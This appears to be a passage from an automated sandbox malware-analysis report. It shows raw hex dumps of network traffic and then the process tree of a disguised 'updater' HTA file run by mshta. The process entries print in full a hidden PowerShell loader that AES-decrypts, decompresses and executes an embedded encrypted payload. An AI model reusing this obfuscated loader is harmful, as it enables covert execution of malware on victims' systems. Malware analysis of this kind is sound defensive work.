                                                                                                                      2023-09-07 16:19:31 UTC2793INData Raw: ff c2 80 36 ff c2 80 36 ff c1 7d 32 ff c3 82 3a ff f6 eb de ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 e7 d8 ff c2 80 36 ff c1 7e 32 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff bf 79 2b ff d2 a0 69 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e1 bf 9a ff be 78 29 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 e5 57 56 55 e5 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55
                                                                                                                      Data Ascii: 66}2:6~2666666y+ix)6666666WVUUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUU
                                                                                                                      2023-09-07 16:19:31 UTC2801INData Raw: ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 50 50 51 ff 77 77 78 ff 86 8a 90 ff 93 6e 45 ff c9 82 33 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 7f 35 ff c0 7c 31 ff ef dd ca ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f9 f3 eb ff f6 eb df ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e3 c4 a1 ff be 77 27 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80
                                                                                                                      Data Ascii: UUVUUVUUVUUVUUVUUVUUVUUVUUVUUVPPQwwxnE36666666666666666665|1w'66666666666
                                                                                                                      2023-09-07 16:19:31 UTC2809INData Raw: ff c7 8a 45 ff cf 9a 5f ff cb 92 53 ff c0 7c 30 ff c1 7d 31 ff c2 80 37 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 e5 57 56 55 e5 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 50 50 51 ff 77 77 78 ff 86 8a 90 ff 93 6e 45 ff c9 82 33 ff c2 80
                                                                                                                      Data Ascii: E_S|0}1766666666WVUUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVPPQwwxnE3
                                                                                                                      2023-09-07 16:19:31 UTC2817INData Raw: ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 e5 57 56 55 e5 55 55
                                                                                                                      Data Ascii: 66666666666666666666666666666666666666666666666666666666666666WVUUU
                                                                                                                      2023-09-07 16:19:31 UTC2824INData Raw: ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 50 50 51 ff 77 77 78 ff 86 8a 90 ff 93 6e 45 ff c9 82 33 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80
                                                                                                                      Data Ascii: UUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVPPQwwxnE366666666666666666666666666666666
                                                                                                                      2023-09-07 16:19:31 UTC2832INData Raw: ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 e5 57 56 55 e5 55 55 56 ff 55 55 56 ff 55 55 56 ff 4a 4a 4b ff a6 a6 a7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f3 f3 f3 ff ec ec ec ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff f2 f2 f2 ff ff ff ff ff ff ff ff ff e8 e8 e8 ff 6f 70 71 ff d8 d9 d9 ff d7 d7
                                                                                                                      Data Ascii: 666666666666666666666666666666WVUUUVUUVUUVJJKopq
                                                                                                                      2023-09-07 16:19:31 UTC2840INData Raw: ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80
                                                                                                                      Data Ascii: 666666666666666666666666666666666666666666666666666666666666666
                                                                                                                      2023-09-07 16:19:32 UTC2848INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      2023-09-07 16:19:32 UTC2856INData Raw: ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 dd 56 56 55 dd 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 56 56 57 ff 56 56 57 ff 56 56 57 ff 56 56 57 ff 56 56 57 ff 56 56 57 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 52 51 52 ff 55 5b 64 ff 8b 79 67 ff c1 80 36 ff c7 81 33 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 dd 56 56 55 dd 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 53 53 54 ff 50 50 51 ff 50 50
                                                                                                                      Data Ascii: 66666666VVUUUVUUVUUVUUVUUVVVWVVWVVWVVWVVWVVWUUVUUVUUVRQRU[dyg636666666666666666666666666666VVUUUVUUVUUVUUVSSTPPQPP
                                                                                                                      2023-09-07 16:19:32 UTC2864INData Raw: ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff ed ff ff ff d4 ff ff ff f3 61 61 62 ff 61 61 62 ff 61 61 62 ff 61 61 62 ff 61 61 62 ff 61 61 62 ff 5c 5e 62 ff 7e 74 6b ff c5 8a 47 ff c8 89 43 ff c7 89 44 ff c7 89 44 ff c7 89 44 ff c7 89 44 ff c7 89 44 ff c7 89 44 ff c7 89 44 ff c7 89 44 ff c7 89 44 ff c7 89 44 ff c7 89 44 ff c7 89 44 ff ff ff ff f3 ff ff ff ed 61 61 62 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 50 52 56 ff 74 6a 60 ff c1 81 39 ff c3 80 35 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80
                                                                                                                      Data Ascii: aabaabaabaabaabaab\^b~tkGCDDDDDDDDDDDDaabUUVUUVUUVUUVUUVPRVtj`9566666666
                                                                                                                      2023-09-07 16:19:32 UTC2871INData Raw: d2 e3 c1 de f0 8b 94 57 4c ec 08 90 22 21 ce 22 2b 98 0c 42 e6 42 93 94 98 93 ef fd 06 d9 3f bc 5b 9b 54 3c 20 b1 ee 6a d6 47 7a c5 ab 80 e9 30 9a de f1 a4 3f 55 4d 0a 09 34 8a 75 29 d2 69 ad 97 0f 50 bf f8 ca 09 02 03 01 00 01 a3 81 f4 30 81 f1 30 1f 06 03 55 1d 23 04 18 30 16 80 14 da ed 64 74 14 9c 14 3c ab dd 99 a9 bd 5b 28 4d 8b 3c c9 d8 30 1d 06 03 55 1d 0e 04 16 04 14 8e 6b 2d 33 6b f4 33 a7 93 b3 13 9a a5 e0 0a f7 12 35 6a 88 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 06 c0 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 16 06 03 55 1d 25 01 01 ff 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 08 30 42 06 03 55 1d 1f 04 3b 30 39 30 37 a0 35 a0 33 86 31 68 74 74 70 3a 2f 2f 63 72 6c 2e 75 73 65 72 74 72 75 73 74 2e 63 6f 6d 2f 55 54 4e 2d 55 53 45 52 46 69 72
                                                                                                                      Data Ascii: WL"!"+BB?[T< jGz0?UM4u)iP00U#0dt<[(M<0Uk-3k35j0U0U00U%0+0BU;0907531http://crl.usertrust.com/UTN-USERFir
                                                                                                                      2023-09-07 16:19:32 UTC2879INData Raw: 04 07 13 07 53 61 6c 66 6f 72 64 31 1a 30 18 06 03 55 04 0a 13 11 43 4f 4d 4f 44 4f 20 43 41 20 4c 69 6d 69 74 65 64 31 2c 30 2a 06 03 55 04 03 13 23 43 4f 4d 4f 44 4f 20 53 48 41 2d 32 35 36 20 54 69 6d 65 20 53 74 61 6d 70 69 6e 67 20 53 69 67 6e 65 72 a0 82 04 a0 30 82 04 9c 30 82 03 84 a0 03 02 01 02 02 10 4e b0 87 8f cc 24 35 36 b2 d8 c9 f7 bf 39 55 77 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 81 95 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 0b 30 09 06 03 55 04 08 13 02 55 54 31 17 30 15 06 03 55 04 07 13 0e 53 61 6c 74 20 4c 61 6b 65 20 43 69 74 79 31 1e 30 1c 06 03 55 04 0a 13 15 54 68 65 20 55 53 45 52 54 52 55 53 54 20 4e 65 74 77 6f 72 6b 31 21 30 1f 06 03 55 04 0b 13 18 68 74 74 70 3a 2f 2f 77 77 77 2e 75 73 65 72 74 72 75 73 74 2e 63 6f
                                                                                                                      Data Ascii: Salford10UCOMODO CA Limited1,0*U#COMODO SHA-256 Time Stamping Signer00N$569Uw0*H010UUS10UUT10USalt Lake City10UThe USERTRUST Network1!0Uhttp://www.usertrust.co


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:18:19:02
                                                                                                                      Start date:07/09/2023
                                                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\Client_version(updater).hta"
                                                                                                                      Imagebase:0x390000
                                                                                                                      File size:13'312 bytes
                                                                                                                      MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:18:19:09
                                                                                                                      Start date:07/09/2023
                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - }
                                                                                                                      Imagebase:0x110000
                                                                                                                      File size:430'592 bytes
                                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:18:19:09
                                                                                                                      Start date:07/09/2023
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6eb1a0000
                                                                                                                      File size:625'664 bytes
                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:18:19:11
                                                                                                                      Start date:07/09/2023
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell -
                                                                                                                      Imagebase:0xee0000
                                                                                                                      File size:232'960 bytes
                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:5
                                                                                                                      Start time:18:19:11
                                                                                                                      Start date:07/09/2023
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6eb1a0000
                                                                                                                      File size:625'664 bytes
                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:18:19:11
                                                                                                                      Start date:07/09/2023
                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):true
